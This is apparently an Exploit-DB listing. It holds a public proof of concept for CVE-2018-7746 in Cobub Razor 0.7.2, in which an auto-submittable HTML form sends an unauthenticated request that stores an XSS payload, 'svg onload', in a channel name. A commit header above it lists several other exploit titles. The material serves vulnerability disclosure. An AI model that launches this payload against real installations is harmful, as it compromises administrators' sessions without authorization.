
6 changes to exploits/shellcodes Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption LineageOS 14.1 Blueborne - Remote Code Execution FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass DotNetNuke DNNarticle Module 11 - Directory Traversal Cobub Razor 0.7.2 - Cross Site Request Forgery
22 lines
No EOL
972 B
Text
22 lines
No EOL
972 B
Text
# Exploit Title: [Cobub Razor 0.7.2 Cross Site Request Forgery]
|
||
# Date: [2018-03-07]
|
||
# Exploit Author: [ppb(ppb@5ecurity.cn)]
|
||
# Vendor Homepage: [https://github.com/cobub/razor/]
|
||
# Software Link: [https://github.com/cobub/razor/]
|
||
# Version: [0.72]
|
||
# CVE : [CVE-2018-7746]
|
||
|
||
There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.
|
||
|
||
|
||
<html>
|
||
<body>
|
||
<script>history.pushState('', '', '/')</script>
|
||
<form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
|
||
<input type="hidden" name="channel_id" value="979" />
|
||
<input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" />
|
||
<input type="hidden" name="platform" value="1" />
|
||
<input type="submit" value="Submit request" />
|
||
</form>
|
||
</body>
|
||
</html> |